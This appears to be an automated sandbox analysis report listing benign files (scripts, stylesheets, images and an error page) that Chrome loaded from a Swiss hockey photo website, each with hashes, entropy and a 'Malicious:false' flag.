                                                                                                                                            Preview:jQuery(document).ready((function(){var e,i,t,r,a,s,o,n,c,l,d,u,h,m=function(){jQuery("#cm-masthead .search-form-top").removeClass("show"),jQuery("#cm-content").removeClass("backdrop")};if(jQuery(".search-top").click((function(){jQuery(this).next("#cm-masthead .search-form-top").toggleClass("show"),jQuery("#cm-content").toggleClass("backdrop"),setTimeout((function(){jQuery("#cm-masthead .search-form-top input").focus()}),200),jQuery(document).on("keyup",(function(e){27===e.keyCode&&jQuery("#cm-masthead .search-form-top").hasClass("show")&&m()})),jQuery(document).on("click.outEvent",(function(e){e.target.closest(".cm-top-search")||(m(),jQuery(document).off("click.outEvent"))}))})),jQuery("#scroll-up").hide(),jQuery(window).scroll((function(){jQuery(this).scrollTop()>1e3?jQuery("#scroll-up").fadeIn():jQuery("#scroll-up").fadeOut()})),jQuery("a#scroll-up").click((function(){return jQuery("body,html").animate({scrollTop:0},800),!1})),jQuery(".cm-menu-primary-container .menu-item-has-childre
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1167
                                                                                                                                            Entropy (8bit):7.2355598453595125
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2872B0F715E9BCA5AD545062F6D45FA4
                                                                                                                                            SHA1:46CFD04DC26FC09E0948321120A03CC6796FB994
                                                                                                                                            SHA-256:006E0ED0BC43148F3F2EAA20E4A408587617A30DF7C1134F065BA40CEFE62692
                                                                                                                                            SHA-512:EA86E0F0963758179043CC1B5B7741F0A5A07B2CE6D9960A0F5662BFC3F1F16C4824368992FD2DE8D57F3D7B5A6560DC39629D7FB3095F5004200FA7F64128E1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......JFIF.............................. .............&.... "$' "+#..".)#0.(,,.'718/<'3,2...........2!.!*-2/2*(,22200220+2222'-2200-2002'.122*2,020(&/2*&(......d.d.."...................................................................1AQ.!"aq...BC...2.............................,......................!...Qq1BR....Aa.................?...................................%,....Zg@..n..w.Z..U....q.w....\.EjE.r}1$..e.Y..E~#.b.p..:.d;...>h....Et.....r..N.....p.<%p...5..u=].f+..i.k....>j...n.-L..i..1v.g...U.=..m8.....E."A".j.T2.N.f.U.....^]W.}.....*.W1.\#.Z.k......6...E=Z....I7Z"<.Z..[H..U.....T1...r].yG.+.<$g...7.._.8..Imx....m..Wu..O....MM[l.jnV.N.r'|y..;]E..f.M...c+...|su.jfX..m. .R`...%.+..>.......#.w..J.#.....vi.vS.G.{..S..,?C..r+7G...4\.*t..K.-\.Q...+......]....v....=....v.si.*...."....4..^]M*...:....|RI..[K\.p...1.NUz.*..$..u.UV=.g{.~...o.:........t6...E%..h......sEr}ML....x..X..L#..yu8U\4.....:.v..}r./N.nL&9c=...`o.....r....-....hZ.V.R.\..]U....h.*a2.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1555
                                                                                                                                            Entropy (8bit):5.249530958699059
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                                                                                                            SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                                                                                                            SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                                                                                                            SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4371
                                                                                                                                            Entropy (8bit):7.782648270064781
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4D122786353EE1F0DB3B143068EBBF61
                                                                                                                                            SHA1:63794AEAB21D6ACEBD58C776185DB4098F2A278F
                                                                                                                                            SHA-256:823156CDC42BAB24D08EC4731D2F9C144A084D079F98FEFF97A621AEAADF32C2
                                                                                                                                            SHA-512:2B86D1AC37899AD6DB20DDAC56F3EFDC9A6878D9705C55210A698BC9EB151722F1F43BFD3F981B4BC9C04ECE59154CBF299DD293A5E303C34498FA140F6092CA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."................................................................................LkS..;....g....v.?.....m&.........<g........r(.!..=.....Y..g.k,..q...l......I...*.....&.$...KwJ...A.@m.1..}.B.o.f.....,...q...o..*..Mr.a..6q.7X........c>...8i.......+.....K......\.y....W>t':"..L...uJxc.U.T..&.S...p...O8.`$O..Hg.....^.).n..T.u3.....!...W..c*..o~.H@..;\.....8.a.O3C......(.............................!"..5Q#12.............H.YR.37F$.......Kz4..C.>.W..@COY...j..j._....T..lJF..w"....&...p.b.~B-?.......h(..Q......j.a<m.u..%(....,d..ocH~.......0Q."0X.b......*HZ.>.&x..g...q%.:..!^.s..`.....<.:Y....Y'.,....(......l._.jEP^F...g.m.`.....\.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:C source, ASCII text, with very long lines (8700), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):8700
                                                                                                                                            Entropy (8bit):4.901679221068419
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:38F95416D5F7349B65699F64E6A587FD
                                                                                                                                            SHA1:2CA6F6F77481C3CDBCAACFC61A56C24F3C933ADE
                                                                                                                                            SHA-256:08756C47213D461BAA3B01F42448A76D11F524470C7A34F9018733889BD4F49C
                                                                                                                                            SHA-512:E855AB926916CC3A9AEF67E6BCAC01056180650710804624452F2D2ACB7CE5CE563FBDC5146D51FFE6607FBCDFF8D806765D4FE14C6316AE559BB0C6281EDAFA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.5
                                                                                                                                            Preview:!function(){if("function"==typeof window.CustomEvent)return!1;function e(e,t){t=t||{bubbles:!1,cancelable:!1,detail:void 0};var n=document.createEvent("CustomEvent");return n.initCustomEvent(e,t.bubbles,t.cancelable,t.detail),n}e.prototype=window.Event.prototype,window.CustomEvent=e}(),function(){var e=function(e){return RegExp("(^| )"+e+"( |$)")},t=function(e,t,n){for(var i=0;i<e.length;i++)t.call(n,e[i])};function n(e){this.element=e}n.prototype={add:function(){t(arguments,function(e){this.contains(e)||(this.element.className+=this.element.className.length>0?" "+e:e)},this)},remove:function(){t(arguments,function(t){this.element.className=this.element.className.replace(e(t),"")},this)},toggle:function(e){return this.contains(e)?(this.remove(e),!1):(this.add(e),!0)},contains:function(t){return e(t).test(this.element.className)},replace:function(e,t){this.remove(e),this.add(t)}},"classList"in Element.prototype||Object.defineProperty(Element.prototype,"classList",{get:function(){return
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):604
                                                                                                                                            Entropy (8bit):7.573620174038291
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:7BD42E5A35B5FB3FF852D6EA9191CA83
                                                                                                                                            SHA1:8A141EB392A05A2DEA3DCD83B97940EF70A81EBC
                                                                                                                                            SHA-256:5C4A713EE4250851232BE9F9F68D41586BE39B299528CFC7266E0B0E7E582E1B
                                                                                                                                            SHA-512:6FF31ACB937D6944570A837BB77AED92DAE41D71681440DC4765758FC40585F55999F2CDD78C4CE76A5AB414331BA9959BAFCFEF7E85B756AAB899C247F02890
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR...0...0.......1....#IDATx...MKTQ...3...K...gP.Eo.Z$..6......"0..."..E-Z...C....+..E.T...JH/.HC.$d...y..."..W...w.3..3..9... ^..Fr4R.Q.....H<...\...V.[...v.L.D...y.wYQ....]....w&...|F...iz8..b.s.r..[.H..5..5D..[@.ed.-...O..=..G..lpD.R.F".J....... .. y*..$>.)V.`..quuP4.W9.}....*..y......~E}.7....IU.~.!.Ak.>....A..o..._.....7.4...{.K..6o.O..5.0n.`..z...V."^. 0.x=..^M...*t...H..9.B.(UD..>heD......."....W..T.E..0D.fYfI..3.-.G".....#.p....q.......Bv..{5.!u.F.i.......[.s.)....I....v.....Y.P.5?...n.'.......;...T......f......Q...~...8.....h.......T3<........IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):15928
                                                                                                                                            Entropy (8bit):7.977613362504397
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A23E7FBA96B31A71292A731055AA562F
                                                                                                                                            SHA1:F571BEA376091481DFCF79892916C0764C98DDE9
                                                                                                                                            SHA-256:BE7D74446BEE732710563714F75F0F9EA833BFA0C7CE80762DFC2A411A5887DB
                                                                                                                                            SHA-512:4F4829632AF5BE205425AD5E7C3082E28621D53FFDFD463B50DA3CE98ADF15004BEECE965197300372AA31D7F6BA8FD80684CA20126638A84B188D845F893CA2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_2037.jpg
                                                                                                                                            Preview:RIFF0>..WEBPVP8X..............VP8 P=.......*....>.@.I%.....|.P..dn-...*lF.f)..k...a...a{^.......|.:C.o.....?................o...?.............<.......g....._.............2?...4..je....).#./.~W.....B.2i...y.......>....d.o`..............[.HO...R..y.z?>.@.......C........'.!.'.......CiqnR../H.....=..+.......-.C.,u\|..-......B.v..aJ...D..q.xe&...[....a..zB/.d..(.;.'.r.b....$i?;..|.C..)R*_r?W..z.A)....Qh.....%......h?...hR.qI..*....!..^......kg.30.-.m.Y.P.....x...GG.?OS......\...+.W....&.Jg..y`.l.s..~..Xi...l?c.....Q=.[..?X.:$.r....5.[`...g..r.Q..|...p..1.}~K....".X...Gq....F:_.....V..w....9D..x.......Vt....t..az..$H. ..1.^"....D....I...|...t.\k..}f..S$...hFhj....vtN.O.|.......m....8#.N4./5....L..GJ.v......#w.4.bH...K.Y2.N.n#G+.\.ULX1.r.z4a.8Jd.........p>.6;..8.\.?q.bw.e8n...|.....D._.....n..7\.%..z."..n...&.?y.s..~.A}.%)......mI......$)Z.9.....k.G...u.`l }..)...7b+@yp..D.........I......1...{.ax.a....'...H$<z$M...C. .....5.O.JV...&.K.Y$k....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2860
                                                                                                                                            Entropy (8bit):7.806240062337995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AE30274C54D1A5857D2EC8798CDA2314
                                                                                                                                            SHA1:C0BE769CC61C67684C85E0EA85DC548572232A2F
                                                                                                                                            SHA-256:8A1B915E6A00F4E77E96B84CDE6A642D75D89BB791FEEAC93E10EF051BAFC0B4
                                                                                                                                            SHA-512:54675894A5A6309E6691E78A21F4CE595E6CC90962A2CB1C8116C32A1D215C0CD63AF840D73123B2D537A365064485FA0BE021EBB5914D7494EB9F23EBB67407
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/04/16716051_1815517505140858_413771705422704964_o.jpg
                                                                                                                                            Preview:RIFF$...WEBPVP8X...........Y..VP8 D...0....*..Z.>.B.J%..&.Z.....b...s6.w..~..1.o~.7...zP.....l6.>.......@;.5..l....~[.....C.]......._.'V..r....g.!b!..$4..,.><..+...q.$..........X1....3..F.T..g.m.(..Yp...W..z?..HM........AHx.e....F..(.vn....i..R&ko.D..5...pSn.|V........z...E.1}g..}J....|8.,Z%._3}...5(..Vf..z....,..{*Z.U.pU..a.C........X..z<...t.V.f..=.k./$u.x...%c2..%.7..SI%gZ.4......u3... ...6.65..pZ..@...<.NC.A...Z}T.|...5..<\.ad.x..b.............$..4.ia....Y.M...F.X.^.?W.+...>...zp..w....&>.+....`........K{S!... ...^.UY.^.HA..4....p..4.\l...m.*.>..1.3V...8.;.Q........X.'...=....d)P..\.......Y`.j#.`.S.(.O...q.z..Y*.hz.[.@.O.r.......^.-..!.#.....M#V'<vH...J..J.t.|&.d8.....pu..w.1r{...\..U.l_z......rv.Z'.5[5.........~..rL../.vY.8/.3X=.......Qd}i..9HJ&...]......%.....WX..vz...........T{...si!.=Tr^....&...qF.`.............~.wAC.Z..W...<N..y|...x.P.Y.SV...!.......x..F.>.".|.&mqn..B.Y....m@...l:.-.M..F......G...%..........&U.t_r0h....4v5.....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3898
                                                                                                                                            Entropy (8bit):7.746357195720355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1FB4935E7074304F7329BCCA79B23BB2
                                                                                                                                            SHA1:7424688A244F248273E5BEA3A289E149DA18EAF0
                                                                                                                                            SHA-256:E18E886285168E804D69EE15D218FDE660823746E884FD69E49C8647A98B0552
                                                                                                                                            SHA-512:658CA906B447925A2BCC9BB9F4F630A3141B5AE276995DAC1B5BBE288CE5D3C7CE4661B6D8EEF85C20049CE6577CC2C6AC902871DA7469E5CC9E1B08CDAB16F1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."..................................................................................i}.n..7.....vQ.....8.t...v.r...@.<.r.3..F.........t.....t...k...4(.l$)...x...3...~...0._U...f.`.[i..;h.-9..~g...k...:.*.u.)..^.?..!.4.........7....W`..6..<.I$W....9..u..i..m.+..r..;z.&.1..2..N2*}.....Y...\.!.c..<{n....8.I.8M.'0......*.............................!"1A..2Q. 3...........f.<..t.*...a..cJ...d3L.mA.DPD..........ma.../.O.LY...X[.".,m.2l.3...*"..l.n.).....\c.[.[...H.g..y...\.u4o..U...d..f:..cmU...7V.D..,.......yf.[k..a.C$.leV..%V.R.v.XI[..l4..E....K0....VH^...b...[_]./%c.u.k.-...16.@9..W.z..G..Q....2%...m.....H".....V.P...E-..d
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3107
                                                                                                                                            Entropy (8bit):7.698987944324858
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:23763F851CAC74D52DEB3DC7DBD14856
                                                                                                                                            SHA1:83243458339FD8B3C507448AE0637424F0405ED0
                                                                                                                                            SHA-256:F62A811DC5471A144FA793630B4843017733D4BEDF97BAA03C453F46C1CE503E
                                                                                                                                            SHA-512:E6F50215FF945ADDC1C0D1F42E4CB502649DC1A5E94C113037274A62AAF71B75E00264693817F546112D26B548C9F4D8D4D270672DFCB9BCEBF0C4ECB9AEB174
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d.........Z...."..............................................................................P..Y..W)...D.v.....KN...Z........./70.Q.S..n....j.>..h.5(x..#]..j....4.LQ+T...XN.L.S)..s..+..d$........^.:[..../m......(..9....8..i..^..-h2*.$.Lyu..<>...k..[kT...O.u.&2,...J.0..u@.b...t .C.5i..-_.....J....+.W.....]LsTO....h..<..V.Dy........D......._...<.........................!1..AQ."#2aq..BR..Cb.....&4Scs...........?...CR......sR....ajn.c#.U.. @.sB.h.,....vZe.....f8p....1Z.<..F.N.|...d/......c.4uI.\.'...<...mb)c.~.|....q.ws...ade./.....~. T.7....@.#.Ev^.....e}( .I...h*N...i.G....)p.E\l(V..V.E..6{.S.|.Xa@2.N*.8..H5{ar.m..=.Ma.`...6...F9.}C..Y..../.]
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (53538), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):53538
                                                                                                                                            Entropy (8bit):4.70255111829055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:843D43D31CE37F8544E5AD2C7A763683
                                                                                                                                            SHA1:5609DDA1B53542DAF04C62857E07EC558B673C0F
                                                                                                                                            SHA-256:2C705AC2B66B50023F4FF66208CC017856F0237A596D70BEBBAEE7E1B7C65B33
                                                                                                                                            SHA-512:636578200DCF25C8CB8586A7AE47DD58777D805120DA4CD2A4918959E0A7DEC8E03E21E11F8C31D1B9D29D07CB461ADD5CF400F9FAA2E9EB5AA366160A67D261
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/blockspare/assets/fontawesome/css/all.css?ver=6.7.1
                                                                                                                                            Preview:.fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left,.fab.fa-pull-left,.fal.fa-pull-left,.far.fa-pull-left,.fas.fa-pull-left{margin-right:.3em}.fa.fa-pull-right,.fab.fa-pull-right,.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22550
                                                                                                                                            Entropy (8bit):7.970154983297908
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:907DCE823F26596C02118A286A41F0BD
                                                                                                                                            SHA1:31AEF0DDADEC26B8D775EF398AF2568C940FC81E
                                                                                                                                            SHA-256:EBD070B7DFF9FE7226D7503DCDBC63E1DC70EE9BC908A2E9F16309FCDD8FD646
                                                                                                                                            SHA-512:77EF5BE9D9E056A227AC26F063CF8FE3644B95078521E818067C2C8F192E9F562E3D544D6CBD26AD5D0BC08ADE47722D50B69FA510EF818F938D61A9B71EE2AC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d.............."................................................................................5....S.C.O.[......YMK....4..e15.....6....N.`...v`..[%.hr.t..:&....._l.h.W./^....\..:._w3X.P..LW....P.......y.%P..Hm#..I....q].e.g..*mh.h..t..S..v`..!....%.8!.T...o.yV..E.<.W.1........C.=.[.v..K....s.i..YF29.'..T(...ar"u.....fs...Uxv.....g...AhJ...*y].19..Z.Q...R.......cD.....w$$..!.ohp.K9u=...d.`..Oo....K-.%u\...0.r..........<.1....H.3.].z.9..7....e.wZ.,.........k%.D.ab..K.{..#.....*.%Y;/w..)m....)......i.t.`..."..... ._b.......9d".I.reyYevh.(....#4#.x]....O...y=..G.*..I...~.M.#.5@.DD....}.w4wr......;.._i......F_C.......6.c?.]V..;.....1.H
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3548
                                                                                                                                            Entropy (8bit):7.854017373788969
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B9605272098222955479C131E246B9E8
                                                                                                                                            SHA1:ACBB9D627DD4BE62654410E2C2687FC397C79635
                                                                                                                                            SHA-256:0A25304F4C820B8241BFC64BDF62EF1C7C7E61842953441E8985E66EB59B7179
                                                                                                                                            SHA-512:EA7E537CAF43CFD7BE16FE69E3F716A33D11F3543D2A073A28CFCA3A2D68EE9D5517A1CF356D22A287F290B46E5F873C37D1971F29BC62885E4DDB0059C05A6F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2021/04/4Y0A4352.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 .....4...*..Z.>.>.H%."!...P...d..'...y..?.........W.....0....~.{..U./...W...b......Y.N}y'...o...._~.'u....?......?...L....\........`....z.z../....yR.`...un}c..\.*#.....Zq6N...[J........-..g..Asq!.....e..G..l '+..-...,H]...T.%.....7.....u....U.U.qs..7.....H[.P....~....?3.v...?.G0...^8u...,......|(....K....*..I..b..........P..,3.....y..cU.v...0..GFO........5.*..93...g"}....8.v'F.p~.Y>.!....J.6X_0..jc....h.<m~......_.{}ND...-.....w....?....LC...".F.1...@...Gb{.u.)....Ig<}L....s.c.m.....PK.U..:.k.m9...d.>o....R}...-..BS{.S/~..x......."$..#.(.l.=...F.5..S6..I.g.3..o..&......m..O..!.....l..M.aG..c4.y`t......i....!.m.?.....n..ieO...<..K.......z,.)v..e.+R...o/..1/.Rc. ....A. /....)pn.2.R[........c%._......)....J.....d8.....:=..L....b........Z..."k....E .zB..B..8R>.O.....X?.n.#.F.g;.9Y.9......cx'^qC..Y......6..f\...z>...5..W...7...h.S..B.!.....n.'_)..9..#[bU.;....W.g..u.. ...K.v.X......o........>2....u.+,B...B
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (463), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):463
                                                                                                                                            Entropy (8bit):4.84050122417067
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DFFF05EAAC24CB31B8AA276CAF9F5742
                                                                                                                                            SHA1:A001AEDC5F488F28A27D8174D2A8715464469A35
                                                                                                                                            SHA-256:04EF3C69054618977A0AC1B83DF925C7F0AD935D3DBB5A464E48C383D00E3D94
                                                                                                                                            SHA-512:BD13AE334B82B20BDC97FA766DAD797EE8EECD4C4F1DD4CA49BDFD553072F81C5A60BF13831D82B0DB6206E6F2BF6A9622DD082506E4C16A3EB81F677D917F2D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:jQuery(document).ready((function(){jQuery("body").on("click",".widget-pagination a",(function(e){var t,r,a,i;e.preventDefault(),t=jQuery(this).attr("href"),a=(r=jQuery(this).parents(".elementor-widget-container")).closest(".elementor-element").attr("data-id"),i=jQuery(this).closest(".tg-module-wrapper"),r.height(i.outerHeight()),i.removeClass("tg-fade-in");r.load(t+' [data-id="'+a+'"] .tg-module-wrapper',(function(){jQuery(this).css("height","auto")}))}))}));
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (7097)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7102
                                                                                                                                            Entropy (8bit):5.200032716115063
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DD694C727FC5E6F6372E142B66DDB576
                                                                                                                                            SHA1:E83E76DF57D64C1CF25B3FDBA9EDCBC8069AF228
                                                                                                                                            SHA-256:46DC1F18EF5FD887B12B7A2866C824A7097B62C6127EE4016F51BAD9118BB6A7
                                                                                                                                            SHA-512:A9CC1C02E97B77BC94728CF73264000626860DAFA05646835A0657EB011DFF3DC8EB3EB69D00835B712A8A8406F8EF909460A9C6624B747E6C9E1E086833E23C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).MicroModal=t()}(this,(function(){"use strict";function e(e,t){for(var o=0;o<t.length;o++){var n=t[o];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}function t(e){return function(e){if(Array.isArray(e))return o(e)}(e)||function(e){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(e))return Array.from(e)}(e)||function(e,t){if(!e)return;if("string"==typeof e)return o(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);"Object"===n&&e.constructor&&(n=e.constructor.name);if("Map"===n||"Set"===n)return Array.from(e);if("Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return o(e,t)}(e)||function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2860
                                                                                                                                            Entropy (8bit):7.655619851718576
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:9669DBAF3EBE98D60035A15C8DECC3BA
                                                                                                                                            SHA1:32939C0C19F201F6A1816DFAAD35C62319A3588A
                                                                                                                                            SHA-256:38A8AAC5C683BBA8585480F7D044DA66CCBFCE858346F9A66FBCD295C4579740
                                                                                                                                            SHA-512:E83BFAAEE2F2B63335E8A75114150F99EC9CA782CCC1B678EB7617E83BC29ABD723EE76F34C5C441583980AFB40A73635DF1FD435B6ACE3907F11452AFB9A572
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
